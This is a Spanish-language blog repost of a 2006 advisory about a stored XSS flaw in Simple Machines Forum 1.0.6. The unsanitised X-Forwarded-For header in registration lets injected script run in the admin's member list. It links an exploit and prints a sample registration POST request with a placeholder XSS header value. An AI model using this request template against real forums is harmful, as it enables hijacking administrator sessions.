ecoestadistica.com

lunes, marzo 06, 2006

Simple Machines Forum - SMF 'X-Forwarded-For' XSS Vuln.

Script Vulnerable: Sources/Register.php
Version:1.0.6

Detalles:

La Variable $_SERVER['HTTP_X_FORWARDED_FOR']no se esteriliza correctamente. Esto se puede utilizar para fijar un post HTTP con una falsificacion de ¨X-Forwarded-For¨ conteniendo codigo arbitrario HTML o codigo Script.
Este Codigo podria ejecutarse cuando el administrador abriera la seccion "View all members" en el panel de control.
La sesion del administrador podria verse comprometida.

Exploit:

http://evuln.com/vulns/86/exploit.html


Ejemplo de HTTP POST Query:

POST /smf/index.php? PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944&action=register2 HTTP/1.0
Host: [host]
X-Forwarded-For: anyIP(XSS)
Cookie: PHPSESSID=fa9c180d0a3f5fae0de2d56ba6fce944
Content-Length: 81

user=mmm&email=mmm@mmm.com&passwrd1=mmm&passwrd2=mmm®agree=1®Submit=Register

ecoestadistica.com